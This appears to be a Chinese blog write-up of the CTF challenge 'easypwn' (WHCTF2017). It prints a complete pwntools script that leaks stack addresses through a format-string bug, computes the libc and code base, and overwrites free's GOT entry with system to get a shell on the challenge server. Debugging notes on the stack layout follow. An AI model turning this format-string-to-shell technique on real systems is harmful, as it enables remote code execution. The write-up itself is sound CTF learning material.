攻防世界easypwn

看题目以为容易,结果进入看到是难度八分,不过先硬着头皮抄一下别人的writeup吧。首先上exp

from pwn import *

r = remote("61.147.171.105", 53146)
elf = ELF('./pwn1')
libc = ELF('./libc.so.6')
def echo(payload):
	print r.recvuntil("Input Your Code:\n")
	r.sendline('1')
	print r.recvuntil("Welcome To WHCTF2017:\n")	
	r.sendline(payload)

def setName(name):
	print r.recvuntil("Input Your Code:\n")
	r.sendline('2')
	print r.recvuntil("Input Your Name:\n")	
	r.sendline(name)

setName("1")

padding_num = 0x7f8 - 0x410
payload = 'a' * padding_num + 'bb%397$p'
echo(payload)
print r.recvuntil("0x")
main_return = int(r.recvuntil('\n').strip(), 16)
libc_base = (main_return - 0xF0) - libc.symbols['__libc_start_main']
system = libc_base + libc.symbols['system']
free = libc_base + libc.symbols['free']
print "system:", hex(system)
print "free:", hex(free)


payload = 'a' * padding_num + 'bb%396$p'
echo(payload)
print r.recvuntil("0x")
init_addr = int(r.recvuntil('\n').strip(), 16)
code_base = init_addr - 0xda0
print "code base:", hex(code_base)
free_got = code_base + elf.got['free']
print "free got:", hex(free_got)

num = (system & 0xFFFF) - padding_num - 0x16
print hex(num + padding_num)
payload = 'a' * padding_num + ('bb%' + str(num) + 'c%133$hn').ljust(16, 'a') + p64(free_got)
echo(payload)
num = ((system >> 16) & 0xFFFF) - padding_num - 0x16
print hex(num + padding_num)
payload = 'a' * padding_num + ('bb%' + str(num) + 'c%133$hn').ljust(16, 'a') + p64(free_got + 2)
echo(payload)
setName('/bin/sh')
r.interactive()

用python2跑一下,直接跑起来取得了shell,然后flag在哪里啊

首先动态调试,看了看函数执行顺序,
程序一开始执行就进入了start函数,
start调用libc里面的libc_start_main函数,把rpb入栈,rbp指向0007FFE9F36C8E8这个地址存了000055BAAF800D9F,是init函数的地址,开了EIP,所以地址会变但是后三位不变
libc_start_main函数调用init函数,init执行完又回到libc-start-main
libc-start-main函数调用main函数,main函数的返回地址___libc_start_main+F0,rbp就指向了init函数的起始地址(里面存的是代码,而不是一般main函数调用其他函数时候的栈底里面存的是参数之类的。),如果是单步调试的话,这里只会显示一个地址,不会显示与libc-start-main的相对位置。
所以main函数栈底的位置一般都是init函数和libc-start-main函数,利用这个就可以像writeup里面算出来函数和libc的基址。

(字符串的结尾是0a00)
第一次输入payload的时候,必须在1000个a后面加上bb再加%397$p,负责就不能输出地址,不知为什么

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值